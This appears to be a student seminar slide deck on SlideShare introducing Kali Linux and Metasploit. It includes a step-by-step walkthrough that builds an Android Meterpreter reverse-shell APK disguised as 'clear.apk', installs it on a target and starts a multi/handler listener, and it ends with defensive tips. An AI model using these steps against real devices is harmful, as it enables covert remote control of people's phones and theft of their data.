SlideShare a Scribd company logo

Metasploit

Download as PPTX, PDF
H
henelpj

This document provides an introduction to Metasploit, a penetration testing platform that enables users to find, exploit, and validate vulnerabilities. It discusses how Metasploit has various interfaces including a console and GUI, and describes some key advantages like its large community and frequent updates. The document then outlines steps to hack an Android device using Metasploit, including creating a payload file, sending it to the target, running Metasploit to exploit the victim's Android.

Internet
1 of 20
Downloaded 117 times
1
2
Most read
3
4
5
6
7
8
9
Most read
10
11
12
Most read
13
14
15
16
17
18
19
20
METASPLOIT GUIDE IN CHARGE Mr.JINSONDEVIS PRESENTED BY HENEL PJ MCA LE S3 ROLLNO 23
CONTENTS  Introduction Kali Linux Penetration testing  Metasploit Introduction to Metasploit Advantages & Disadvantages  Steps to Hacking Android with Metasploit Payload File Creation Sending payload To the Target Running Metasploit and AttackerSetup Commands to exploits victim’sAndroid  Future Scope  Conclusion  References
INTRODUCTION ON KALI LINUX Debian-based Linuxdistribution aimed at advanced PenetrationTestingand SecurityAuditing. ReleaseDate: March 13th, 2013. Security-focused versionof Linuxthat offers a large numberof tools to seekout weaknessesand secure your network. Kali containsseveraltools Information security tasks PenetrationTesting,Securityresearch Computer Forensicsand ReverseEngineering
Developers: Mati Aharoni, DevonKearnsand Raphael Hertzog of offensive security. Open source 600 penetration testing tools + Applications Platforms - x86, x86-64, armel LatestRelease– Kali 2017.3 – 21st November, 2017 Easyupgrade to future versions
Also called pentesting Testing a computer system/network /Web application to find vulnerabilities. Benefits: Intelligently manage vulnerabilities Avoid the cost of network downtime Meet regulatoryrequirements Preserve corporate image and customer loyalty Penetration Testing
MAIN TERMS EXPLOIT- a piece of code written to take advantage of a particular vulnerability inthe system. PAYLOAD- simplescriptsthat the hackersutilize to interact with a hacked system. LHOST- TheIPaddress youwant your listener to bind to. LPORT- Theport youwantyour listener to bind to. Meterpreter - advanced, dynamically extensible payload that uses in memorydll injection & extended over the n/w at runtime.
METASPLOIT penetration testing platform that enables to find, exploit, andvalidate vulnerabilities. Author:Rapid7 License: BSD-3-clause Twoversions:commercial and free(Community) edition. hardware requirements to install Metasploit  1 GB RAM available  1 GB+ available diskspace  2 GHz+ processor
METASPLOITINTERFACES Metasploit can be used either with Console, command prompt or with GUI. Msfconsole –part of metasploitframework, provide interface with all options. Msfcli –runs directly from the commandline& puts priority on scripting. Armitage –GUI for metasploit framework.
Advantages  Open source  Frequently updated  Huge community  Easy to deployuser specific exploit Disadvantages  Difficult to learn  Can crash your system if not used wisely  Requires deep knowledge for exploit development
HACKINGWIINDOWSWITH METASPLOIT STEP1:OPEN THE METASPLOIT CONSOLE IN KALI Path:Applications → Exploitation Tools → Metasploit
Fig: Metasploit console
STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL FOR CREATING THE PAYLOAD FILE msf > msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.207 LPORT=6060 R > clear.apk
STEP 3: Install apk
STEP 4: USE THE “exploit/multi/handler” Payload Handler is a module that provides all the features of the metasploit payload system to exploit. msf > use exploit/multi/handler STEP 5: SET THE PAYLOAD msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp STEP 6: SET THE LOCAL HOST msf exploit(multi/handler) > set LHOST 192.168.43.207 STEP 7: SET THE LOCAL PORT msf exploit(multi/handler) > set LPORT 6060
Metasploit
STEP 8: RUN THE COMMAND “ exploit ” msf exploit(multi/handler) > exploit
FUTURE SCOPE Beingopen sourceframework, it hasgot huge community support. Inorder to face newsecurity challengesMetasploit isfrequently updated for zero-day vulnerabilities. More and moreexploits will be made available to its database for users. Upcomingversionswill be moreefficient, user- friendly, GUI-based, web-based with customizing options along with its interactive console.
CONCLUSION The backdoor application when installed and turned on the mobile allows attacker to read, write and modify data. Cautions are. Never permanently enable installing of Apps from “Unknown sources “. Never take your phone to important meetings or anywhere you don't want people listening. Keep your Android up to date. Installing antivirus software on your Android device.
REFERENCE www.metasploit.com www.rapid7.com https://tools.kali.org/exploitation-tools/metasploit- framework www.securitytube.net www.google.com www.youtube.com
THANK YOU…………

More Related Content

PPTX
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
PPTX
Metasploit
Lalith Sai
 
PPTX
Introduction To Exploitation & Metasploit
Raghav Bisht
 
PPTX
Metasploit framwork
Deepanshu Gajbhiye
 
PPTX
OSI and TCPIP Model
Tapan Khilar
 
PPTX
Understanding NMAP
Phannarith Ou, G-CISO
 
PPT
Bad news messages
Akshay Kumar
 
PPTX
Hypervisor
kalpita surve
 
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
Metasploit
Lalith Sai
 
Introduction To Exploitation & Metasploit
Raghav Bisht
 
Metasploit framwork
Deepanshu Gajbhiye
 
OSI and TCPIP Model
Tapan Khilar
 
Understanding NMAP
Phannarith Ou, G-CISO
 
Bad news messages
Akshay Kumar
 
Hypervisor
kalpita surve
 

What's hot (20)

PPTX
Metasploit
Institute of Information Security (IIS)
 
PPTX
Introduction to Metasploit
GTU
 
PPTX
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
PDF
Metaploit
Ajinkya Pathak
 
PDF
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
PDF
Threat Modelling
n|u - The Open Security Community
 
PPTX
Metasploit seminar
henelpj
 
PDF
Nmap Basics
amiable_indian
 
PPTX
Session Hijacking
n|u - The Open Security Community
 
PPTX
Introduction to penetration testing
Nezar Alazzabi
 
PPTX
Kali linux.ppt
Ahmedalhassar1
 
PPTX
Penetration testing reporting and methodology
Rashad Aliyev
 
PPTX
Finalppt metasploit
devilback
 
PPTX
NMap
Pritesh Raka
 
PPTX
Session Hijacking ppt
Harsh Kevadia
 
PPT
Penetration Testing Basics
Rick Wanner
 
PPTX
Wireshark
Sourav Roy
 
PPTX
John the ripper & hydra password cracking tool
Md. Raquibul Hoque
 
PPTX
Nessus-Vulnerability Tester
Aditya Jain
 
PPTX
Introduction to Malware Analysis
Andrew McNicol
 
Metasploit
Institute of Information Security (IIS)
 
Introduction to Metasploit
GTU
 
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
Metaploit
Ajinkya Pathak
 
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
Threat Modelling
n|u - The Open Security Community
 
Metasploit seminar
henelpj
 
Nmap Basics
amiable_indian
 
Session Hijacking
n|u - The Open Security Community
 
Introduction to penetration testing
Nezar Alazzabi
 
Kali linux.ppt
Ahmedalhassar1
 
Penetration testing reporting and methodology
Rashad Aliyev
 
Finalppt metasploit
devilback
 
NMap
Pritesh Raka
 
Session Hijacking ppt
Harsh Kevadia
 
Penetration Testing Basics
Rick Wanner
 
Wireshark
Sourav Roy
 
John the ripper & hydra password cracking tool
Md. Raquibul Hoque
 
Nessus-Vulnerability Tester
Aditya Jain
 
Introduction to Malware Analysis
Andrew McNicol
 
Ad

Similar to Metasploit (20)

PPTX
Lifnaaaaaa e
henelpj
 
PDF
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
PDF
24 33 -_metasploit
wozgeass
 
PPTX
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
PPT
Metapwn
n|u - The Open Security Community
 
PPT
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
Prajwal Panchmahalkar
 
PDF
ENPM808 Independent Study Final Report - amaster 2019
Alexander Master
 
DOCX
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
DOCX
Backtrack Manual Part6
Nutan Kumar Panda
 
PPT
Metasploit-TOI-Ebryx-PVT-Ltd
Ali Hussain
 
DOCX
Backtrack Manual Part7
Nutan Kumar Panda
 
DOC
Exploit Frameworks
phanleson
 
PPTX
Introduction of Metasploit and task.pptx
hira11ahmed02
 
PDF
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
Gabriel Mathenge
 
PDF
Metasploit Demo
n|u - The Open Security Community
 
PPTX
Pentesting with linux
Hammad Ahmed Khawaja
 
DOCX
unit 2 Intoduction to Tools and Platforms.docx
Guna Dhondwad
 
PDF
Unveiling-Patchwork
Brandon Levene
 
PPTX
The FatRat
AjilSunny
 
PPT
Threats, Vulnerabilities & Security measures in Linux
Amitesh Bharti
 
Lifnaaaaaa e
henelpj
 
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
24 33 -_metasploit
wozgeass
 
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
Metapwn
n|u - The Open Security Community
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
Prajwal Panchmahalkar
 
ENPM808 Independent Study Final Report - amaster 2019
Alexander Master
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
Backtrack Manual Part6
Nutan Kumar Panda
 
Metasploit-TOI-Ebryx-PVT-Ltd
Ali Hussain
 
Backtrack Manual Part7
Nutan Kumar Panda
 
Exploit Frameworks
phanleson
 
Introduction of Metasploit and task.pptx
hira11ahmed02
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
Gabriel Mathenge
 
Metasploit Demo
n|u - The Open Security Community
 
Pentesting with linux
Hammad Ahmed Khawaja
 
unit 2 Intoduction to Tools and Platforms.docx
Guna Dhondwad
 
Unveiling-Patchwork
Brandon Levene
 
The FatRat
AjilSunny
 
Threats, Vulnerabilities & Security measures in Linux
Amitesh Bharti
 
Ad

Recently uploaded (20)

PPTX
Introduction to cybersecurity and digital nettiquette
shanefrancisjavier21
 
PPTX
E -tech empowerment technologies PowerPoint
kylebalatero12
 
PPTX
artificial intelligence overview of it and more
yafotin445
 
PPT
415456121-Jiwratrwecdtwfdsfwgdwedvwe dbwsdjsadca-EVN.ppt
woldemariamworku2
 
PPTX
newyork.pptxirantrafgshenepalchinachinane
PrashantKoirala12
 
PPTX
IPCNA VIRTUAL CLASSES INTERMEDIATE 6 PROJECT.pptx
AldoCharaRojas
 
PPTX
artificialintelligenceai1-copy-210604123353.pptx
b45r14
 
PDF
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
alexiskandar061
 
DOC
Rose毕业证学历认证,利物浦约翰摩尔斯大学毕业证国外本科毕业证
acoqwo
 
PPTX
Layers_of_the_Earth_Grade7.pptx class by
varadhanvara05
 
PDF
The Ikigai Template _ Recalibrate How You Spend Your Time.pdf
KinchitJain2
 
PDF
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
DtMalhonSharma
 
PDF
Exploring VPS Hosting Trends for SMBs in 2025
Liquid Web
 
PDF
simpleintnettestmetiaerl for the simple testint
sherlockholmes10009
 
PPT
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
MelwinPaul6
 
PPT
isotopes_sddsadsaadasdasdasdasdsa1213.ppt
Kenneth James Alamillo
 
PPTX
Internet Safety for Seniors presentation
mwnorman1
 
PPTX
Database Information System - Management Information System
faizhossain3
 
PDF
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
minhtrietgect
 
PPTX
SAP Ariba Sourcing PPT for learning material
NKKumar16
 
Introduction to cybersecurity and digital nettiquette
shanefrancisjavier21
 
E -tech empowerment technologies PowerPoint
kylebalatero12
 
artificial intelligence overview of it and more
yafotin445
 
415456121-Jiwratrwecdtwfdsfwgdwedvwe dbwsdjsadca-EVN.ppt
woldemariamworku2
 
newyork.pptxirantrafgshenepalchinachinane
PrashantKoirala12
 
IPCNA VIRTUAL CLASSES INTERMEDIATE 6 PROJECT.pptx
AldoCharaRojas
 
artificialintelligenceai1-copy-210604123353.pptx
b45r14
 
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
alexiskandar061
 
Rose毕业证学历认证,利物浦约翰摩尔斯大学毕业证国外本科毕业证
acoqwo
 
Layers_of_the_Earth_Grade7.pptx class by
varadhanvara05
 
The Ikigai Template _ Recalibrate How You Spend Your Time.pdf
KinchitJain2
 
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
DtMalhonSharma
 
Exploring VPS Hosting Trends for SMBs in 2025
Liquid Web
 
simpleintnettestmetiaerl for the simple testint
sherlockholmes10009
 
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
MelwinPaul6
 
isotopes_sddsadsaadasdasdasdasdsa1213.ppt
Kenneth James Alamillo
 
Internet Safety for Seniors presentation
mwnorman1
 
Database Information System - Management Information System
faizhossain3
 
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
minhtrietgect
 
SAP Ariba Sourcing PPT for learning material
NKKumar16
 

Metasploit

  • 1. METASPLOIT GUIDE IN CHARGE Mr.JINSONDEVIS PRESENTED BY HENEL PJ MCA LE S3 ROLLNO 23
  • 2. CONTENTS  Introduction Kali Linux Penetration testing  Metasploit Introduction to Metasploit Advantages & Disadvantages  Steps to Hacking Android with Metasploit Payload File Creation Sending payload To the Target Running Metasploit and AttackerSetup Commands to exploits victim’sAndroid  Future Scope  Conclusion  References
  • 3. INTRODUCTION ON KALI LINUX Debian-based Linuxdistribution aimed at advanced PenetrationTestingand SecurityAuditing. ReleaseDate: March 13th, 2013. Security-focused versionof Linuxthat offers a large numberof tools to seekout weaknessesand secure your network. Kali containsseveraltools Information security tasks PenetrationTesting,Securityresearch Computer Forensicsand ReverseEngineering
  • 4. Developers: Mati Aharoni, DevonKearnsand Raphael Hertzog of offensive security. Open source 600 penetration testing tools + Applications Platforms - x86, x86-64, armel LatestRelease– Kali 2017.3 – 21st November, 2017 Easyupgrade to future versions
  • 5. Also called pentesting Testing a computer system/network /Web application to find vulnerabilities. Benefits: Intelligently manage vulnerabilities Avoid the cost of network downtime Meet regulatoryrequirements Preserve corporate image and customer loyalty Penetration Testing
  • 6. MAIN TERMS EXPLOIT- a piece of code written to take advantage of a particular vulnerability inthe system. PAYLOAD- simplescriptsthat the hackersutilize to interact with a hacked system. LHOST- TheIPaddress youwant your listener to bind to. LPORT- Theport youwantyour listener to bind to. Meterpreter - advanced, dynamically extensible payload that uses in memorydll injection & extended over the n/w at runtime.
  • 7. METASPLOIT penetration testing platform that enables to find, exploit, andvalidate vulnerabilities. Author:Rapid7 License: BSD-3-clause Twoversions:commercial and free(Community) edition. hardware requirements to install Metasploit  1 GB RAM available  1 GB+ available diskspace  2 GHz+ processor
  • 8. METASPLOITINTERFACES Metasploit can be used either with Console, command prompt or with GUI. Msfconsole –part of metasploitframework, provide interface with all options. Msfcli –runs directly from the commandline& puts priority on scripting. Armitage –GUI for metasploit framework.
  • 9. Advantages  Open source  Frequently updated  Huge community  Easy to deployuser specific exploit Disadvantages  Difficult to learn  Can crash your system if not used wisely  Requires deep knowledge for exploit development
  • 10. HACKINGWIINDOWSWITH METASPLOIT STEP1:OPEN THE METASPLOIT CONSOLE IN KALI Path:Applications → Exploitation Tools → Metasploit
  • 12. STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL FOR CREATING THE PAYLOAD FILE msf > msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.207 LPORT=6060 R > clear.apk
  • 14. STEP 4: USE THE “exploit/multi/handler” Payload Handler is a module that provides all the features of the metasploit payload system to exploit. msf > use exploit/multi/handler STEP 5: SET THE PAYLOAD msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp STEP 6: SET THE LOCAL HOST msf exploit(multi/handler) > set LHOST 192.168.43.207 STEP 7: SET THE LOCAL PORT msf exploit(multi/handler) > set LPORT 6060
  • 16. STEP 8: RUN THE COMMAND “ exploit ” msf exploit(multi/handler) > exploit
  • 17. FUTURE SCOPE Beingopen sourceframework, it hasgot huge community support. Inorder to face newsecurity challengesMetasploit isfrequently updated for zero-day vulnerabilities. More and moreexploits will be made available to its database for users. Upcomingversionswill be moreefficient, user- friendly, GUI-based, web-based with customizing options along with its interactive console.
  • 18. CONCLUSION The backdoor application when installed and turned on the mobile allows attacker to read, write and modify data. Cautions are. Never permanently enable installing of Apps from “Unknown sources “. Never take your phone to important meetings or anywhere you don't want people listening. Keep your Android up to date. Installing antivirus software on your Android device.